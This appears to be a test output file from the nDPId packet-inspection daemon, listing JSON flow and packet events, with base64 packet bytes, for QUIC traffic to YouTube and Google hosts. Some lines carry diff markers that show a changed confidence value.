02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1621431857841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431857841,"pkt":"AAAAAAAAAAEA00bUCABFAAViuPFAAH4RUFCokEAF1bwv9\/j4AbsFTi6fxv8AAB0I0bxRKTuUwgQAAEU0fyjgv48\/VCRtPz6ASN0OHxQrQLq7h+XvdqYpW0IdDgkyYs+qaZ2IuwKTrk6YqitoieAEJmESJxxd68I9xE+yxkJr90SUnR1M1QTaj6cNmtlgHivCEvYeIZrstWnYNHPWHxnYIDL\/faLN3v2l\/vAW9BxUhwUIIu2faUrN8uHdB\/1Wrbe6vX+0r97gH6rBkczoTPMVg2MQIvACvg7MEMvDmXReZiu8aHhYLNrKXQoHb3wlKFlaWklVhuGIkGp4WLeoDI28YQ3SoqEC3msnpaiKbJSu3i6gx3XYZSTNOZx2wTyUn5kAQEbqb5uoOB1osvVBX+OO4htJiDv1h\/1wp1YCP4Ga4XsP5b3LRFOWiCauo\/HDX\/dO+7Ks21ut5u7nrFp3vsYoOXsfxp3FeIFKCtW5kZD4EnHVyJ9Zv5ZsjCJnr6xOm5z7e1IdJiZc2UH557C9gO4HZL07YwIYBvxA4wecK4fxBR7uVNiQ0wrRJ7w0kX8LOcTGayOjs2lnNAGuPIUjzX6GdQ+Z6ezg2kVKIBy3g6BFqh5fYkn1MSCjFfmNy8pMek9wRbT5tx57QhbVEjzXKpfYCtfwBAPjvmTcyi\/pj1MMF5TdQU6Q9QzzZlwgK7SGoS2km9o4rEOuFsTnF65lollpj4WjyeQhLnNa47OLuo7V6lbQKKTXm54krAZoSaOjejVJLSvx4iwoHF4MJo0t4oNk8LuJjCQWC817H+Z91yZxFTv9SHWBSuEab71KDyg+CD9tUOH2iasAIoErfwlhLdyeLW8yCcg52npVgZ0HFkVfZqdV2LZOvMnR1Lg\/onBxIxjcTUBxhzgd3czjkrC9JJxXxAgQrtSuhn1dUlC22+vGs9MbLXg8o8BLwo7d1x8VTGQdGCnPHJxR6cm1HaHawimYIbxfZ0eKQ6Vt5aV+WhdjRqtUk3j3G5p0NglB1UWHexuNnoOmN+lBZl\/GapDd2m5Yk7FubUhQNbPoy6E8bME5Hyr\/o7sXuXXRcHrH4\/nWsGCvY2cX9njBk7l0Q3Yczt900ouVi1hKp\/UFjI5huUtSUtRnaMFTMB366CW+VDqVruM59b2jx9lTfzd8Z+TvHn6Syvm4tnFxFqmW3I+PMOiWhZlm7TO8sSkYpmYZPGgg63y9rYr6LeryRTudm5RUAR60p430i9LDtZIPD8L\/MTcq9RO1P7jlBqNqxA9zXscaw\/B56sjo6WGP1vLVdb4FB7besaQ5UMN\/nkGoKYOK0deEGrBwjmMxyU6xHUVyr830VfWqI8HAMQd9zqBnczWNEyIFokx9IwZdRoEl1iKfrT8hCud9tIKVpmH0bVMxmQxtxxxT8zSplUV07U4v7xPcnwepR7HmBCZlhrg1BGmEp4se9b9u4xoLK08+r1ejmIpu8VrM\/VOxNFOxYErJFfxlSs9U3X2QWpe9HZGajMBAk0q9\/clUh17xxU\/E6aLjJj3k35K86utGs2O220V0V06R
4gxX2gbFkwOMY9INm5D1T523esnitGk9u1AfZJokW7t1XCTb71Id31C6\/p3ioxcXBd5BAbp\/OL9sejWk9TArIOZnUUDZmTsTOfiogn73e7vN5zFf8cIof0JYkZp9otum3UR4BRg87QtqURR6ehFMZE+c0BmbqnHZ89A\/2y4Apn9NnyDFZ0B9ih4m0az7qg2w2IhGEycq5dwSXGZZcya5GcjtVBe7BZ7TXCBQ0AlSjG\/PcOYH6vAazB1DcKOcGryDTW2ld4S\/DeIQ7lnUczZptB1DL94kJw3IET\/eU6zvDBmlBeRN"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r4---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": 
{"client_requested_server_name":"r4---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1621431858130,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431858130,"pkt":"AAAAAAAAAAEA4PSECABFAAViduhAAH4RAluokEAF9Nag28wxAbsFTqBqzv8AAB0IlCvC3zvNTXQAAEU0bBkQLI3bPsbsoEo+cMFgRuBfI0IwALzZrBviHAA+Z1QJp1oftAmcZe0+1BtbG4PtaoRq86omaKbtxZpajLb14FXlpTsMbQWq548iLQ39D2mbEO3zF7ysXTwD\/P9gtJYLXSC0VWqv8z6iYP7A9ndUj4J9CsimScdH7Ab2WJohqMY5cmDhFqDohhOiLpahlc\/4Ug2oP7U6uykk3o\/sBx1t9\/ooiZ2L9IlfdPdzo5JC+fFevV1mvuFRA6qYzmhcKWxznVBjFJHIj1tsalMyiYEP7klZqDWRsUJbEL6smhbtt9aDog+ge1\/kDqXPWI58aqJbP0clqgdwPz9S2Y6WlkC6+L8byOJjqS6tC8RKuT7szyzaD\/QpeLtuTIaugz0rhTbG3tHV2+eAGw0JlKNnYY4d8gLImSL3Z6Vbebp9MOrwwenGSYEjJEdyKLbl91wAN4oX8fjB0uE4+Z1nljjQ7\/Ma\/RgFHOnpp8JptJLgEJQUuj7kca\/3lobKXvXUHslLAXaGHu93+qu4aAMp7dXhfcVd5T0FWmHXp+hPsOVQgNwfcRktO7mmDqTPc4g+iqUrcYsMitif3WlIVEwBPbtDte
CVHHkYIPZf0u+syu9A+I7FZ\/5duQI3QVq8hoSrN7bG5w\/zvEqP\/yYI0sjCFuVzyhXgLIEZJ1qJGRZQmSo00VbsElmeDT5TArRJNB7LuwPPihSe5f5Hs5CtfrGYHAZ3s44Ph6a\/IzKJlY9P8nsk1zJw85nZ+gBW1pbpf7Yx\/rmROIiRfURp5w+iM4nAMz0PpDktxSPJLH6r6IEms2fxM+L62MlUVBrYxZJJ4FKD6OSMvWHR+I0vhCE1kpYYhUmcB5sRAbPNVykSrT9KfoViisi1N4w19VqeUgl2Qcs9W6sML2oqVYyVtGBCD9qZnkUGpY2w200a7PtBxVt\/QBEH9v4MPebuiH5rjnSwmFgF\/YosV+2evpl6G8EYlQHIlAthqw3OzMzNUp2uIoUf6nBnYLeE0fFV+obzpD\/u3S83796oUZOibm+TF\/PrubnS+F6u3RS3ljwSqE7VUMHGjfQSaSRBeed0LreweZVA\/\/uCm2qDttjlLYqNjHyrnYThnZom5ECvmIWgSxX9O95W5BQeuuA7HMmr11Xq9vK9dt33jd5FN1yJ5eBzKVde4uSpSNgwENQ0sTbmXF8W0di2iH\/3Y3JARyiVNvb87pbQiF2C3fPJvBbyOmdUzYi4IKODjNa8529r\/2WPUbyL0gcgBBvdC+00m+RoZ8pSEkm873NVfGtcv7ZJNfBbSSmOtEGolsa1rgMIjqSl+gu3HY54LWS5r+MnsCESbFYroCnveYzrsVdGohrb\/zq3EMH7BAbPbeE2Sc7d\/Ko6vjgRH\/9L3cq8ORzLT3GdrtyRveeT83v+9cCjRxC9ljG22JeAq7TqGxX2jJfa25ONu5zfti\/Q\/UCDd+R5D9Q9slQkxPCeDJTSOXa4gnpgy0Q49vnBGzMzMNwOxtJPSIb2QOpg7IidPlZBf2aUO5XpP0KqgFdpm7BG7ULgBjR2GFmXUP1c\/zzdTDDutnR9ALbmfU8Kf5Krd1hNOuhGq5klqMBVXf6hyAA9S4QMp\/it8pHP4\/S66VpOu3bNUTeTIUh888Aqw1WB0NjCw6\/asqZTdZrh8cvMmW+2WW7xmsl6WAqYoU+tialu7WkDUU8OoT42banjTBlSGGvh8863vIZ2StyYDb8zwIU4zuhyMr7FDtlza6jHpIArriq6hYW\/CxoKThchF5eUWwDlQolmqcSSMgBX"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": 
{"client_requested_server_name":"r3---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1621431858501,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431858501,"pkt":"AAAAAAAAAAEA737VCABFAAViA9lAAH4RSiuokEAFI8KdL8CsAbsFTiKUxP8AAB0Iuy4iiZ7Rc3cAAEU0Q4F3W2ov\/JA2RQPk1kCE6d2abuA1AzJ9v4cgD5r98N+jLM5q\/vKba7ePXttHZOnfzIXKHdtGp13XXGc0y1g0VbYiejL5PEPTPKK+5FUHxNJc+4iSUfYHJil1jWJsaI14aq8Z9k\/D9Frx2Pd8Ccb5b8I5wMMvAXlFIaThZX3+88jwhgIBY4WhNolXEK3QjVERqqjNlflz0Crvl9eKzWDjAvjmOz12493yS+U4C5g7xeSC6Cv481a1zOEEDBXxUJwyeekPCKvNOVETC0idyTRu4Xx7IK\/97JI5UkTjH1VgYb5EEV1DY00jaUTBEjI+fpvuHX57KvIXmj+n1PLaIlVIJy8AxZjfib+NKJ2DnJlEkZOyKzqiFASH+Rv2xHATwBmim0oQbD6SH+mogD\/Zpo5pMTXstRq0ZunclX1q7Mso4TGqtUbs2zzTYctOAA+ng0TvelIWG4Bu4bkkRiZSqlwJ1jDY17CBHzqEyVQgWgeFozJDhGJh\/dhP8nm+IU5EDOJiIPPx8pW7TyQGz8lnsN6LAsQyJgXVZTCNJPU9t6HmegbS0bQ7Kt1DxeYvK6m+GxUMA1DiRw0yw80Uxxf4xuJnn3EJVi8ekAMdVXpaGI37r+vhgsLGCAZgMrHlnTtfOSbgYZBAPdnhiG4xbmDlbIuvY\/BrdQlshSbHN\/3tWjBfc0Zz0J59ufrjAJoriiVdye+Lc3LAld\/nudhV2vnaxR1ShgYPYZhQbGRWlEkEaL1z4rltv60VXAhCWkeJdSv1\/ACb44aJ8HLAaQ7pBCmit\/NMrMwITKyJcPkFF5GRWhel5oEvZ86mY1\/+WA5KqTi9Xb0N6B9CXR4d22U1O5JA419I\/H5b7Kkx0ByhWkeFRz9cXZPMDmowmLHSflTpfTjRerEoB9b+Rp9ZUpHpgHycHnEiiqsSYZ8fJXaPa5ArE6FfrIB\/5\/ex2ULG10VUM6bdMkBHDYOPYQwR5jQfvBJclQo48pqc+jEulTW4ACP9EukaDaWRXQiI\/ao9oqdHF73hElq8zIR0CIH1bOZkU5WrVTO4kXEcriR07\/4SHXlZ0F+XTEnvRY1owmXDXHgtgn794JMTxP6ovnrC1UqLv9d8SQ3P2kaXpKnETUi1\/jmOit96zvfXkyF+GojweLkNJjL5JM3njEGp7izSmZ\/PvKHWCYsP+157DfpYPmMO9R\/yz3E1zaEv\/1lMgciv1XSwptuzqoQHSbZjgs5nX68VkOSYsQYJ60P94MXKCCvjFqKn+6X2Mcn5Zop+3W0Nj0hveNw19pzYiEtOJJVwof6DyxkFKNuQU3HtgPl+GWUUWRig\/vzAY+l22jeUNKekbZmAn14baa3EO6690bwRTg8ZvdcHFz9TEDMbzR666JgoyJFvKc3UbuWhbUstPfau4V9F9qnYD6cFiMRtdBaOgJniitEFpxszoLhTHZZT9Vh\/mXiomY\/wkAwa56XbyHUeRgPu9zAw
N6kJW+N7Ye6rlwVPmyPFgUTGn9xmD2YMEr3PeigCIEsSvM0ujBoTlPiFdY26WdH4Tr\/XKmZTQnQrnQptoJDzmG+XaceU23hwOGeY5C6MIxfdvw7Blgvoz8uvCg\/rl0wKl3ubvkABoQ3NzBDUuTP++2gH8HONwB\/wWFza94nHQdoBnk4+rigd+C1oglD8lXIC31MYbN8b51797Aod+NKPnYy35esPaxwNUQDbAPX6W5J2vPC3vU+GmsC754Qjyng5h09pOy7odu+JINrtufSLUCeH14aG0hXQTPJRTPDp6g0aPtL075ZE"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": 
{"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":39,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":51300,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":27,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":27,"total-idle-flows":23,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":119,"global_ts_msec":1621431907429} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1621431907429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431907429,"pkt":"AAAAAAAAAAEASYHhCABFAAViVjpAAH4R7N2okEAFiH1DYPJfAbsFTr4Zy\/8AAB0I\/FKj4Rr2N+kAAEU0sUI8yYk\/y\/bPar7IxdtLPlBpfIbJVt\/XG3zjjFAN3PLuPY9aF7M0Mm1Pwz+2ym6LReOn1tdk2pHBdYLYtkb1fXiK42fzBzEBqAcpJ3jEWiim3tGYhBW4xkjPcpkR4V9U0CEIA3BhEltloJi32PcQkjdxPGPSXrYJEyPYT2ODSFP5zFDNrUpqMfmpryMeEByqj9aqyy7TtbIyDDLLeql6c5+G+WJfvTxj\/9W8WJJXv5A2+2wt7cmjNXE5vXIKsxD6kuaexZdsNa+Jr4jhQmDPWt56pOF3oSc\/exjC9ZwNL6Byz+cqgo090k1LpSBEAmIO2JahQD43fCbyWV4juaKj0MNO1pbmnz4OwflX262ok\/jM84d9YgjHmPQxVDwGpKB+k7iS9gP0IunBzPqxZuHmkhsXO2zydYFJgSC\/\/zhZjHtGa3A5oLpp5svgFFyHIWHwV1WsgPl5G+m0zjGIw88EoCFcNVrWAkqaltwzoOYaOv8JtFjKTBrTWSS2yCenFPvS4CiVpH0qOzrWck30mR6VKv+x6O39S8f9xZtECQhmG2mYSgzqYSOTLu8TYzFGeM6fkshiZAH4Rcuh\/rlN\/Jsa5H6fbeTi4JAaGZso4qnhApLrXa2o7crXqkvVvH28YWmlFQx+j96UuaBvpXUP+eVJpGTHlKAySs7PdqSueL59G0N7i7L9plI6+dk46FvYeEp+f7wxaDe9ofiPhkKl77nzCoHlpu9QHGjUG1hD3LrTqagn5YxaAe\/vZz+ZR5XDMGkyjvtQ8CzH750O\/y3RIu\/NzoJHfz70Mwhb5mva6OuXGfu3pnDfzyYgmW2f1EdlTYToarOz0VkmFc90sq7r5B7\/PNAKsIbJnOQjS463M2IqteuzLlV\/keR25no9irWXNenFMchSjXATFHJrxa4+tuks0hrAuCQ9P74T8tIg\/9Rn7z3XecTiiaReESIeFX0atEm6CxOi26ozXUDN+aybaCuI9uH4o3kMLh8H9APymvsHTZQpUtqIhC\/oo5G5CBnxU1wWMKhoH5C8zcwERQJ1+G9XqwN3WjaalURD+EDpCo6uvKka1xUNuYrbD3WxT0n1ODENp0Qq8Ouczn6Bc74W3bNVp3L\/70lPtnGF\/vDIQ0AgcqodmWxltWd4x+oE5e9lDvVivstNGUsf3WVMBPLQOTWeJow9hxLTXFulkHKm\/9m8ONJVe8mRVVH3uwATt6K7cW+M5UHJlGbqkrrKvaq6stg6DWgtUtqTZGBCuGviWVywpkMFl8JYsKFOo2C8dYdoed+lyR29yIQyzC+5PshUVMz+15EUTfehVIrQdinMs8GC1ufyZUllTZ3PDmgBejR3TZTfNXPjDfwNc+TazIP8DqvBBPRJBB2kbLub9\/kgyw1MlzRzbAVqKbkfo6Xh7m\/la1ItF1D8yrjJBFh9Tmgu4+xXJRv7DW6+G1WkmPAAG9w\/i5FmPFMvZQ76UHxJWyf
TyoxkIVglJSTw2j5Mv6nedASTTIn+oaAKlR0MpsDHaGI6cAT0G5S4F+89LSYi0DoIHcWC2W70SgDJsNbgysQVHdV4uTwXh\/LOoPR1c\/24Ev\/nFE4oTBtSXRHj\/g9aJYtNJ4Bphqchj\/ydCiV1FKZ4F0VFKXdo786gAHfX2mBeOeLn0Lhn3tTg\/G9s+9dQN5nOBgv0p5HQgLKG6NUNXB4bml7Gr4C7jyXtpqMA10w34E9oSHrOYzPVMRKouJzSoQiDSBJKXtDko+KZvedTXBDCzTxXxdQMGdU5EABWjdJgadLe3U6LR1WE"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons4.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"beacons4.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1621432429509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432429509,"pkt":"AAAAAAAAAAEAS1QMCABFAAViiC5AAH4RLC2okEAF3FB+Sf3QAbsFThnNxv8AAB0I+DF9BCeanTIAAEU00hb7OpWAmpFx8qx0bByvtqmnAysWW16ZDvTiBt7+493PQtqd2pKjXT8n6LbaHZrBOy7lzR4IRozP76TQ9DxkFAYnbYCqRHqgPXL5pU+zxh+eB1qzeaw4PD9sxeGceY7QPFO2WPj99N6anJpqI5Hcerw4FTNYR8r1d+SWlStf7eJXbom+ocP1XACdlYH06H03DxDNPtLz\/XsvkXaRPpqyh9hAe4diK1f3iIM2QaXjqckDT+tjaYEhYR+BbL7vNxBY8wfGtlxPQZ7GgVmzdWF+sXyPQuPaTJPnp6PHwhYcy3PsXRrOmC13SC3mZvcQ4+IGjqfqhG+D9wugf7LmbKqsznjJfXzBwYIpCNL+MHcorYpGmUUn6+dyppyRtIzd5m8irD6UYlkt+9VgpoYwGSX69u5si0i0viLsrK8i\/m6Mf0iQ\/Spi96VDtOTfFfSGprx6ij\/O7kc7TXG8oZ0bctqwNFJYOvlWB4CxfK1rYG0mD7xeo2AAgOTRDH8+AYCxUdEzUhiS9ozc2lRPoJkzP2AUr79N7oMid\/+ZbqVhmrpW7XdI12cPRgMmLNFI2MCGTdtlIH5yj6rZtmN67GfACUVK3eHHT3gwe9Jqb0QlZnM70xY
